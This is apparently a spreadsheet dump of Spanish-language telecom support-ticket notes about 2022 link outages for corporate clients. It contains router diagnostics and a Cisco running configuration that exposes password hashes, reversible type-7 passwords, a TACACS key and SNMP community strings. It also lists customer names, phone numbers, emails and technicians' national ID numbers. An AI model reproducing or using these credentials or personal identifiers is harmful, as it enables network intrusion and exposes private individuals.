BUENOS DÍAS ESTIMADO SR. REYES.
                PERSONAL A CARGO INDICA QUE REALIZARON LLAMADAS DE PRUEBA Y SE HA MANTENIDO EN OBSERVACIÓN EL SERVICIO Y NO SE HAN OBSERVADO EVENTOS.
PODRÍA POYARNOS EN VALIDAR EL FUNCIONAMIENTO ACTUAL DESDE SU LADO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE WALTER REYES 45787911 QUIEN COMENTA QUE SE ENCUENTRA EN REUNIÓN, SOLICITA SE LE LLAME A LAS 11 AM PARA VALIDAR. 2001833467</t>
  </si>
  <si>
    <t>CLIENTE WALTER REYES 45787911 NOS VALIDA QUE EL E1 YA SE ENCUENTRA OPERATIVO, INDICA QUE RESUELVE A NIVEL INTERNO. AUTORIZA EL CIERRE DEL CASO. ID:2001891803</t>
  </si>
  <si>
    <t>F4565530</t>
  </si>
  <si>
    <t>-* SE HABLA CON NOE PEREZ (CLIENTE) INFORMA QUE REALIZARÁ PRUEBAS CON PR, SOLICITA SE MANTENGA EN MONITOREO PARA EL DÍA DE MAÑANA A LAS 8:00 HRS -*
-*</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON DIEGO MORA/CLIENTE 2243-7253 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>***---  SE RESPONDE CORREO A CL ---*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 23:38
PARA: NOE PEREZ &lt;NOE.PEREZ1@WALMART.COM&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI LOS CHILES ID: CONTR0001571034OC
BUENAS NOCHES ESTIMADO SR. PEREZ.
                GRACIAS POR LA INFORMACIÓN, QUEDAMOS AL PENDIENTE DE SUS AVANCES.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: NOE PEREZ [MAILTO:NOE.PEREZ1@WALMART.COM]
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 23:33
PARA: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI LOS CHILES ID: CONTR0001571034OC
BUENAS NOCHES,
EL DÍA DE MAÑANA SE ESTARÁ VALIDANDO CON EL PERSONAL EN SITIO, ESTAREMOS RETROALIMENTANDO POR ESTA VÍA
SALUDOS</t>
  </si>
  <si>
    <t>F4565532</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR. ARNOLD CABALLERO 31850297,  EXLICA QUE ESTA CONFORME CON LAS PRUEBAS REALIZADA EN LA VISITA TECNICA DE AYER, LO QUE NECESITA ES QUE PROVISIONALMENTE SE REALICE UN AUMENTO DE ANCHO DE BANDA PROVISIONAL POR VARIOS DIAS PARA POSTERIORMENTE EVALUAR LA CONTRATACION DE MAYOR ANCHO DE BANDA, SE LE EXPLICA QUE ESE TEMA SI ES POSIBLE PERO NO SE VE CON FALLA, SE VALIDA A NIVEL COMERCIAL CON SU EJECUTIVO DE CUENTA CON ORDEN DE SERVICIO, CONFIRMA DE ENTERADO, SE PROCEDE AL CIERRE DEL INCIDENTE, CALL ID: 2001840849
CSC891_FARSIMAN_KENNEDY#SH IP FLOW TOP-TALKERS
SRCIF         SRCIPADDRESS    DSTIF         DSTIPADDRESS    PR SRCP DSTP BYTES
VL1           192.168.61.40   GI0.3264      192.168.1.130   06 DB22 B331    57M
VL1           192.168.61.40   GI0.3264      192.168.1.130   06 EBA2 B643    50M
VL1           192.168.61.40   GI0.3264      192.168.1.130   06 BD92 AD63    32M
VL1           192.168.61.40   GI0.3264      192.168.1.130   06 803C AAAB    30M
GI0.3264      192.168.1.42    VL1*          192.168.61.2    06 C00C EBDE  3700K
GI0.3264      142.250.64.138  VL1*          192.168.61.5    06 01BB DFE6  1764K
GI0.3264      192.168.1.130   VL1*          192.168.61.40   06 B331 DB22  1246K
GI0.3264      192.168.1.130   VL1*          192.168.61.40   06 B643 EBA2  1095K
GI0.3264      192.168.1.42    VL1*          192.168.61.3    06 C00C E5C8   836K
GI0.3264      192.168.1.130   VL1*          192.168.61.40   06 AAAB 803C   663K
10 OF 10 TOP TALKERS SHOWN. 329 FLOWS PROCESSED.
CSC891_FARSIMAN_KENNEDY#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1                        0         0         0         0         0         0         0         0         0
  FASTETHERNET0                 0         0         0         0         0         0         0         0         0
  FASTETHERNET1                 0         0         0         0         0         0         0         0         0
  FASTETHERNET2                 0         0         0         0         0         0         0         0         0
  FASTETHERNET3                 0         0         0         0         0         0         0         0         0
  FASTETHERNET4                 0         0         0         0         0         0         0         0         0
  FASTETHERNET5                 0         0         0         0         0         0         0         0         0
  FASTETHERNET6                 0         0         0         0         0         0         0         0         0
* FASTETHERNET7                 0         0         0         0  10756000      1018   1115000       656         0
* FASTETHERNET8                 0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0              0         0         0       395   1032000       702  10290000       972         0
* GIGABITETHERNET0.2169         -         -         -         -         -         -         -         -         -
* GIGABITETHERNET0.3264         -         -         -         -         -         -         -         -         -
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0      7602  10770000      1039   1093000       663         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
ENLACE CONTNUA SATURADO:
&lt;FDCEHNIVN1D1EIM1&gt;PING -C 3000 -S 1500 -M 30 -B -VPN FARMACIA_SIMAN  192.168.61.80
  PING 192.168.61.80: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!.!!!!!!!!!.!!!!!!!!!!!.!.!!!!!!!.!!!!!!.!!!.!!!.!!!.!!!!!!!!!!..!!.!!!!!!!!!!!!!.!!!!!!.!!!!!!.!!.!!!!!.!!!!.!!!!.!!!!!!!!!!!!!!.!!!.!!!.!!.!.!.!!.!!.!!!.!!!!!!..!!!!!!!!!!!!.!.!!.!!!!!!!!!!!!!!!!!.!.!.!!!!!!!!.!!!!!!!!.!!.!!!!!!..!!!!!!!!!!.!!..!!!!!.!!!!!!.!!!!!!!.!!.!!.!.!!!!!!!!!!..!!!!!!.!!.
  --- 192.168.61.80 PING STATISTICS ---
    299 PACKET(S) TRANSMITTED
    245 PACKET(S) RECEIVED
    18.06% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/4/12 MS</t>
  </si>
  <si>
    <t>F4565550</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OLIVER CUX   AL  30224426 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
LLAMADA DESDE HERRAMIENTA VIVO
**</t>
  </si>
  <si>
    <t>F4565579</t>
  </si>
  <si>
    <t>-* NOE PEREZ 2243-7253 (CLIENTE) INFORMA QUE POR EL HORARIO NO SE CUENTA CON PERSONAL EN SITIO, HARA LAS VALIDACIONES CORRESPONDIENTES SOLICITA SE REANUDE EL SEGUIMIENTO EL DÍA DE MAÑANA -*
-*</t>
  </si>
  <si>
    <t>F4565599</t>
  </si>
  <si>
    <t>SE VALIDA CON PERSONAL DE MONITOREO 5B 24207212 (HECTOR MADRID) INFORMA QUE NO SE TIENEN REPORTES DE MANTENIMIENTO O PROBLEMAS DE ENERGIA, POR LO QUE SE ACUERDA VISITA EN CONJUNTO PARA REVISION DE EQUIPS Y MEDIO DE TRANSMISION. (COBRE)
ID
3001022735
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:14
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 17/05/2022 17:30:44</t>
  </si>
  <si>
    <t>F4565603</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 25562049 INDICA QUE AUN SE VE ALARMADO EL SERVICIO Y QUE NO HAY PROBLEMAS DE ENERGIA || SE NOTIFICA A GESTOR **
ID 2001821347
**</t>
  </si>
  <si>
    <t>####SE HABLA CON SUP. NAVAS Y CC DEL SALVADOR QUIEN INDICA EL CLIENTE AUTORIZARA LOS PERMISOS PARA REALIZAR LA VISITA A LAS 14:00 PM DEL DIA DE HOY##
3001102031
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:03:02
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 18/05/2022 10:02:26</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
IP2037200 || SD1126184
AXEL SAMUEL LOPEZ ORTIZ
BUENOS DÍAS ESTIMADOS.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO CON EL ID IP2037200, PERSONAL TÉCNICO YA VALIDO LA PLANTA EXTERNA Y NO RECIBE SEÑAL PROVENIENTE DEL ATM, SOLICITAMOS DE SU APOYO PARA GESTIONAR LA APERTURA DEL ATM, QUEDAMOS A LA ESPERA QUE NOS BRINDE EL DÍA Y LA HORA QUE SE PODRÁ LLEVAR A CABO LA VISITA TÉCNICA.
ADJUNTO EL LISTADO DEL PERSONAL QUE ATENDERÁ:
DUI                     NOMBRE
01907591-5 SAMUEL DE JESUS PEREZ LOPEZ
02878871-1 JOSE ALFREDO JIMENEZ
00580847-9 CARLOS EDUARDO GOMEZ ZELEDON
04086716-7 GERARDO ANTONIO MINERO FERNANDEZ
02400310-1 EDGAR MAURICIO MONTOYA SANCHEZ
03547221-1 RONAL MOREL CRESPIN
03245714-4 ADAN ERNESTO GONZALEZ
01968544-3 WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 JOSE SALVADOR PORTILLO VELASQUEZ
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4565617</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 25562049  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001932898
**</t>
  </si>
  <si>
    <t>F4565628</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 50 MINUTO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2219012 UPTIME IS 50 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 19:33:00 GMT MON MAY 16 2022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48299
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX16148299
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          DATAK9        PERMANENT      DATAK9
CONFIGURATION REGISTER IS 0X2102
IP2219012#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4751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219012
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 4096
NO LOGGING CONSOLE
ENABLE SECRET 5 $1$HPQS$7KPT8VWRPMIWEZYFEBL3C/
!
AAA NEW-MODEL
!
!
AAA AUTHENTICATION LOGIN DEFAULT GROUP TACACS+ LOCAL
AAA AUTHENTICATION LOGIN CON_ACC GROUP TACACS+ LOCAL NONE
AAA AUTHENTICATION ENABLE DEFAULT GROUP TACACS+ NON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
CLOCK TIMEZONE GMT -6 0
!
NO IPV6 CEF
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
IP MULTICAST-ROUTING
!
!
NO IP BOOTP SERVER
NO IP DOMAIN LOOKUP
IP DOMAIN NAME TELECOM.COM.SV
IP NAME-SERVER 201.247.155.225
IP NAME-SERVER 201.247.157.225
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX16148299
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 071B724040591A57474253
USERNAME ADMIN PRIVILEGE 15 SECRET 5 $1$8JAN$U3OHEFV1SBB3NDZQTI6JB1
!
REDUNDANCY
!
!
!
!
IP TCP SYNWAIT-TIME 10
!
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.1.24 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2219012SV/_/
 BANDWIDTH 3072
 IP ADDRESS 10.142.24.8 255.255.255.240
 IP PIM SPARSE-MODE
 IP RIP ADVERTISE 90
 IP VIRTUAL-REASSEMBLY IN
 IP OSPF NETWORK NON-BROADCAST
 IP OSPF PRIORITY 0
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.96.1.22 255.255.255.252
 IP PIM SPARSE-MODE
 IP FLOW INGRESS
 IP FLOW EGRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE ATM0/0/0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
!
ROUTER OSPF 1
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 NETWORK 22.96.1.20 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
 DISTANCE 100
!
ROUTER OSPF 16
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 SUBNETS
 NETWORK 10.142.24.0 0.0.0.15 AREA 0
 NEIGHBOR 10.142.24.1 PRIORITY 254
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 20
 SORT-BY BYTES
 CACHE-TIMEOUT 100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NO CDP RUN
!
!
!
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
TACACS-SERVER KEY 7 095B6E5814250506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PASSWORD 7 02050D480809
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
IP2219012#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45 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 49 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
 INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
MAY 17 01:33:31.227: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 17 01:33:31.227: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 16 19:33:32.507 GMT: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 01:33:32 UTC TUE MAY 17 2022 TO 19:33:32 GMT MON MAY 16 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
MAY 16 19:33:32.795 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
MAY 16 19:33:33.835 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
MAY 16 19:33:34.571 GMT: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 16 19:33:35.643 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
MAY 16 19:33:36.331 GMT: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 06-DEC-11 16:02 BY PROD_REL_TEAM
MAY 16 19:33:36.331 GMT: %SNMP-5-COLDSTART: SNMP AGENT ON HOST IP2219012 IS UNDERGOING A COLD START
MAY 16 19:33:36.347 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
MAY 16 19:33:36.351 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
MAY 16 19:33:36.355 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
MAY 16 19:33:36.355 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
MAY 16 19:33:36.355 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
MAY 16 19:33:37.343 GMT: %PIM-5-DRCHG: DR CHANGE FROM NEIGHBOR 0.0.0.0 TO 10.142.24.8 ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:33:41.343 GMT: %PIM-5-DRCHG: DR CHANGE FROM NEIGHBOR 0.0.0.0 TO 22.96.1.22 ON INTERFACE GIGABITETHERNET0/1
MAY 16 19:33:43.139 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 16 19:33:44.139 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 16 19:34:01.999 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.13 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.003 GMT: %PIM-5-DRCHG: DR CHANGE FROM NEIGHBOR 10.142.24.8 TO 10.142.24.13 ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.163 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.10 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.187 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.11 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.199 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.12 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.363 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.2 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.399 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.5 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:02.523 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.142.24.1 UP ON INTERFACE GIGABITETHERNET0/0
MAY 16 19:34:11.347 GMT: %PIM-5-NBRCHG: NEIGHBOR 22.96.1.21 UP ON INTERFACE GIGABITETHERNET0/1
MAY 16 19:34:46.363 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
MAY 16 19:34:51.607 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.98.55.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
MAY 16 19:36:06.363 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
MAY 16 19:36:06.363 GMT: %AAA-3-DROPACCTFAIL: ACCOUNTING RECORD DROPPED, SEND TO SERVER FAILED: SYSTEM
MAY 16 19:36:45.719 GMT: %OSPF-5-ADJCHG: PROCESS 16, NBR 10.142.24.1 ON GIGABITETHERNET0/0 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 16 19:36:47.711 GMT: %OSPF-5-ADJCHG: PROCESS 16, NBR 10.142.24.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
MAY 16 19:37:02.475 GMT: %PIM-6-INVALID_RP_JOIN: RECEIVED (*, 225.0.1.2) JOIN FROM 22.96.1.21 FOR INVALID RP 10.76.0.60
MAY 16 19:37:47.575 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL0, CHANGED STATE TO UP
MAY 16 19:38:32.131 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
MAY 16 20:23:05.403 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS AUTHENTICATION SERVER TYPE TACACS+ (UNKNOWN)
IP2219012#
SHOW CLOCK
20:23:34.859 GMT MON MAY 16 2022
IP2219012#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.142.24.1             0   8CFD.18AA.65CB  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.2            46   001F.6C6F.A698  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.5            46   442B.0368.C000  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.8             -   442B.0374.D100  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.10           46   44D3.CA12.8EC0  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.11           46   4CE1.75E5.6900  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.12           46   442B.03E9.6700  ARPA   GIGABITETHERNET0/0
INTERNET  10.142.24.13           46   4CE1.75C8.EA80  ARPA   GIGABITETHERNET0/0
INTERNET  22.96.1.21             48   CCEF.481A.ADE0  ARPA   GIGABITETHERNET0/1
INTERNET  22.96.1.22              -   442B.0374.D101  ARPA   GIGABITETHERNET0/1
IP2219012#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/IP2219012SV/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
AT0/0/0                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
TU0                            UP             UP
IP2219012#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.142.24.8     YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.96.1.22      YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES NVRAM  DOWN                  DOWN
LOOPBACK5                  10.166.1.24     YES NVRAM  UP                    UP
TUNNEL0                    10.142.24.8     YES UNSET  UP                    UP
IP2219012#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALMART 10.142.24.8
  PING 10.142.24.8: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.142.24.8 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.30.52
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALMART 10.142.24.8
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.142.24.0/28  DIRECT  0    0             D   10.142.24.1     VBDIF1760			</t>
  </si>
  <si>
    <t>F4565655</t>
  </si>
  <si>
    <t xml:space="preserve">
UNICENTRO#PIN   192.168.182.42
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.182.42, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
UNICENTRO#
PE 10.164. 12.8
UNICENTRO#SHO IP ROUTE  192.168.182.42
ROUTING ENTRY FOR 192.168.182.40/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA OSPF 1, OSPF 160, OSPF 134, OSPF 140, OSPF 142, OSPF 144, OSPF 143, OSPF 146, OSPF 150, OSPF 152, OSPF 153, OSPF 151, OSPF 154, OSPF 156, OSPF 155, OSPF 161, OSPF 162, OSPF 169, OSPF 106, OSPF 167, OSPF 124, OSPF 181, BGP 13682
  ADVERTISED BY OSPF 1 SUBNETS ROUTE-MAP STATIC-TO-OSPF1
                OSPF 162 SUBNETS
                BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA PORT-CHANNEL7.3121
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
UNICENTRO#SHO RUN INTE  PORT-CHANNEL7.3121
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 226 BYTES
!
INTERFACE PORT-CHANNEL7.3121
 DESCRIPTION CONTRALORIA GENERAL DE CUENTAS CGC1 CENTRAL REDUNDANTE 7-32 Z13 INFO 100MB C-0201900335
 ENCAPSULATION DOT1Q 3121
 IP ADDRESS 192.168.182.41 255.255.255.252
 IP OSPF MTU-IGNORE
END
U</t>
  </si>
  <si>
    <t>SE PROCEDE A SOLICITAR APOYO PARA ENVIO DE CORREO POR EL TICKET  EL CLIENTE POR VIA TELEFONICA SOLICITO MONITOREO LO CUAL NO SE DOCUMENTO  SE PORCEDE A ENVIAR CORREO CON EVICDENCIAS, SE AGRADECE EL APOYO DE EDY BENITO.</t>
  </si>
  <si>
    <t>SE PORCEDE CON CIERRE.
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 18:47
PARA: KYJFOCK@CONTRALORIA.GOB.GT &lt;KYJFOCK@CONTRALORIA.GOB.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: TICKET SD1126198 SE ENVÍAN PRUEBAS
ESTIMADO CLIENTE SE ENVÍAN LAS EVIDENCIAS DEL ENLACE 678000027T REPORTADO CON EL NÚMERO DE TICKET SD1126198 CUANTO SE TUVO UN EL INCIDENTE
CÓMO SE COMPROBÓ CON SU PERSONA EL ENLACE SE ENCUENTRA OPERATIVO Y ESTABLE.
*MAR 31 15:15:30.017 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO DOWN
*MAR 31 15:15:30.019 GUA: %OSPF-5-ADJCHG: PROCESS 181, NBR 200.119.129.161 ON GI                                                                                        GABITETHERNET0/0/0.3597 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETA                                                                                        CHED
*MAR 31 15:15:31.017 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABI                                                                                        TETHERNET0/0/0, CHANGED STATE TO DOWN
*MAR 31 15:57:01.199 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGE                                                                                        D STATE TO UP
